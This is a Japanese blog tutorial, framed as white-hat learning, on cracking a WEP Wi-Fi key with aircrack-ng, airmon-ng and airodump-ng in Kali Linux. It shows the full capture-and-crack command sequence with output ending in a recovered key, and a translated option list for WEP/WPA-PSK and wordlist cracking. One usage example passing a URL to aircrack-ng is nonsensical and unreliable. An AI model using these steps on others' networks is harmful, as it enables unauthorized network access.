【注意】このサイトに記載されていることを他人に試すことは「不正アクセス禁止法」に該当する場合があります。詳しくはこちらから

ハッカーはaircrack-ngで無線LANの解析を確認する(Kali Linux)

ホワイトハッカーの知識aircrack-ng,airmon-ng,airodump-ng

無線LANの解析を理解するためにまとめてみました。
この動作確認は自分のwifiルータで確認を行っています。
 
【追加】 Youtubeに最新動画を掲載しました。
「ハッカーはaircrack-ngで無線LANのパスワード解析を確認する(Kali Linux)」

aircrack-ngとは

Aircrack-ngは、802.11WEPおよびWPA-PSKキーのクラッキングプログラムで、十分なデータパケットがキャプチャされるとキーを回復することができます。標準的なFMS攻撃にKoreK攻撃のような最適化を加えたものや、全く新しいPTW攻撃を実装しており、他のWEPクラッキングツールと比較して攻撃が非常に高速になります。
 

機能

  • モニタリング パケットキャプチャーとテキストファイルへのデータ出力(サードパーティ製ツールでの処理用
  • 攻撃の方法 パケットインジェクションによるリプレイアタック、認証解除、偽装アクセスポイントなどの攻撃
  • テスト WiFiカードやドライバーの性能確認(キャプチャとインジェクション)
  • クラッキング WEPおよびWPA PSK(WPA 1および2)の解読
 

ツールの場所

[Applications]→[06-Wireless Attacks]→[aircrack-ng]
 

ツールと使用方法

aircrack-ng [options] <.cap / .ivs file(s)>
 
例 aircrack-ng https://www.yahoo.co.jp
 
【実行イメージ】少し端折って整形しています。
(個人情報はマスクしています。)
 
aircrack-ng sample-01.cap
 
◎wifiで通信しているWEP APを解析します。
// wifiアダプターをモニターモードに変更
┌──(root--localhost)-[/home/kali]
└─# airmon-ng start wlan0
// 周辺のAPのパケットを収集
┌──(root--localhost)-[/home/kali]
└─# airodump-ng wlan0mon
CH  6 ][ Elapsed: 6 s ][ 2021-10-08 15:05                                                  
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID            
FF:FF:FF:FF:FF:FF  -62        4        0    0   7  270   WPA2 CCMP   PSK  xxxxx-xxxxxx-g     
FF:FF:FF:FF:FF:FE  -62        5        0    0   7   54e  WEP  WEP         xxxxx-xxxxxx-gw
 
// 調査するターゲートの情報だけ表示する。
┌──(root--localhost)-[/home/kali]
└─# airodump-ng --bssid FF:FF:FF:FF:FF:FE --channel 7 -w sample wlan0mon
15:10:58  Created capture file "asmple-01.cap".


CH  7 ][ Elapsed: 36 mins ][ 2021-10-08 15:47


BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID


FF:FF:FF:FF:FF:FE  -63  50    20872   185246    7   7   54e  WEP  WEP    OPN  xxxxx-xxxxxx-gw
 
// パスワードをクラックする。
┌──(kali--localhost)-[~]
└─$ aircrack-ng sample-01.cap
Reading packets, please wait...
Opening sample-01.cap
Read 50561 packets.
                                 Got 18779 out of 15000 IVsStarting PTW attack with 18779 ivs.
#  BSSID              ESSID                     Encryption


1  FF:FF:FF:FF:FF:FE  xxxxx-xxxxxx-gw           WEP (18779 IVs)


Choosing first network as target.


Reading packets, please wait...
Opening sample-01.cap
Read 50561 packets.


1 potential targets


Attack will be restarted every 5000 captured ivs.
:
:
                 Aircrack-ng 1.6 


                [00:08:24] Tested 820 keys (got 54591 IVs)
           Got 50002 out of 50000 IVsStarting PTW attack with 50002 ivs.
KB    depth   byte(vote)
 0    0/ 13   39(70144) 6D(65792) 0D(64256) 6C(64000) 22(63488) 70(63488) 
 1    0/  1   F5(76288) 3D(63488) 92(62976) 4A(62720) 7F(61952) 98(61696) 
 2   17/  2   F8(60416) C3(60160) D0(60160) F2(60160) FD(60160) 94(59904) 
 3    0/  1   9A(77056) AB(62976) 1E(62720) C0(61696) 43(61440) C7(61184) 
 4    2/  4   FE(62976) 08(62720) 26(62720) 80(61952) E9(61440) A9(60928) 


  KEY FOUND! [ 31:66:66:35:66:34:31:37:61:35:62:39:38 ] (ASCII: zzzzzzzz4e3b8 )
  Decrypted correctly: 100%
 

オプション(Common options)

-a <amode>

force attack mode. (1/WEP, 2/WPA-PSK)
フォースアタックモード。(1/wep, 2/wpa-psk)

-e <essid>

target selection: network identifier.
ターゲット選択:ネットワーク識別子

-b <bssid>

target selection: access point’s MAC.
ターゲット選択:アクセスポイントのMAC

-p <nbcpu>

# of CPU to use.  (default: all CPUs)
使用するCPUの#を指定します。 (デフォルト:全CPU)

-q

enable quiet mode. (no status output)
クワイエットモードを有効にします。(ステータス出力なし)

-C <macs>

merge the given APs to a virtual one.
与えられたAPを仮想のAPに統合します。

-l <file>

write key to file. Overwrites file.
キーをファイルに書き込みます。ファイルを上書きします。
 

オプション(Static WEP cracking options)

-c

search alpha-numeric characters only.
英数字のみを検索します。

-t

search binary coded decimal chr only.
2進化10進chrのみを検索します。

-h

search the numeric key for Fritz!BOX.
テンキーでFritz!BOXを検索します。

-d <mask>

use masking of the key. (A1:XX:CF:YY)
キーのマスキングを使用します。(A1:XX:CF:YY)

-m <maddr>

MAC address to filter usable packets.
使用可能なパケットをフィルタリングするためのMACアドレスです。

-n <nbits>

WEP key length :  64/128/152/256/512.
WEPキー長 : 64/128/152/256/512.

-i <index>

WEP key index (1 to 4), default: any.
WEPキーインデックス(1~4)、デフォルト:any

-f <fudge>

bruteforce fudge factor,  default: 2.
ブルートフォースファッジファクター、デフォルト:2。

-k <korek>

disable one attack method. (1 to 17)
1つの攻撃方法を無効にします。(1~17)

-x or -x0

disable bruteforce for last keybytes.
最後のキーバイトのブルートフォースを無効にします。

-x1

last keybyte bruteforcing.  (default)
最後のキーバイトのブルートフォースを行います。 (デフォルト)

-x2

enable last  2 keybytes bruteforcing.
最後の2つのキーバイトのブルートフォースを有効にする。

-X

disable  bruteforce   multithreading.
ブルートフォース・マルチスレッドを無効にします。

-y

experimental  single bruteforce mode.
実験的な単一のブルートフォース・モード。

-K

use only old KoreK attacks. (pre-PTW)
古いKoreKの攻撃だけを使う。(プレPTW)

-s

show the key in ASCII while cracking.
クラッキング中のキーをアスキーで表示します。

-M <num>

specify maximum number of IVs to use.
使用するIVの最大数を指定します。

-D

WEP decloak, skips broken keystreams.
WEPデクローク、壊れたキーストリームをスキップします。

-P <num>

PTW debug:  1: disable Klein, 2: PTW.
PTWのデバッグ。 1:クラインを無効にする、2:PTW。

-1

run only 1 try to crack key with PTW.
PTWでのクラックは1回しかできません。

-V

run in visual inspection mode.
目視検査モードで実行します。
 

オプション(WEP and WPA-PSK cracking options)

-w <words>

path to wordlist(s) filename(s).
ワードリスト(複数)へのパス ファイル名(複数)。

-N <file>

path to new session filename.
新しいセッションファイルへのパス。

-R <file>

path to existing session filename.
既存のセッションファイルへのパス。
 

オプション(WPA-PSK options)

-E <file>

create EWSA Project file v3.
EWSAプロジェクトファイルの作成 v3.

-j <file>

create Hashcat v3.6+ file. (HCCAPX)
Hashcat v3.6+のファイルを作成します。(HCCAPX)

-J <file>

create Hashcat file. (HCCAP)
Hashcatファイルを作成します。(HCCAP)

-S

WPA cracking speed test.
WPAクラッキングのスピードテスト。

-Z <sec>

WPA cracking speed test length of execution.
WPAクラッキングのスピードテスト実行の長さ。

-r <DB>

path to airolib-ng database. (Cannot be used with -w)
airolib-ngデータベースへのパス。(-wとは併用できません)
 

SIMD selection:

–simd-list

Show a list of the available SIMD architectures, for this machine.
このマシンで利用可能なSIMDアーキテクチャのリストを表示します。

–simd=<option>

Use specific SIMD architecture. 
特定のSIMDアーキテクチャを使用する。
<option> may be one of the following, depending on your platform:
<option>には、プラットフォームに応じて以下のいずれかを指定します。
generic
avx512
avx2
avx
sse2
altivec
power8
asimd
neon
 

オプション(Other options)

-u

Displays # of CPUs & MMX/SSE support.
CPUの数とMMX/SSEのサポートを表示します。

–help

Displays this usage screen.
この使用画面を表示します。
 

YouTubeに最新動画を掲載しました。

aircrack-ngツールのまとめ

kali linuxで使われている全てのプログラムは「aircrack-ng」を使われているようで、このコマンドさえ知っていれば「鬼に金棒」なのでしょうか。
 
クラックはその時の状態により、出来たり出来なかったりするみたいです。
 
今回も、何回もクラックを試みましたけど一筋縄ではいかなかったです。
ヒントを一つ。「調査するターゲートの情報だけ表示する。」の時に大量に「#Data」を集めるとクラックできそうですね。
 
いつもそうですが、試行錯誤してます。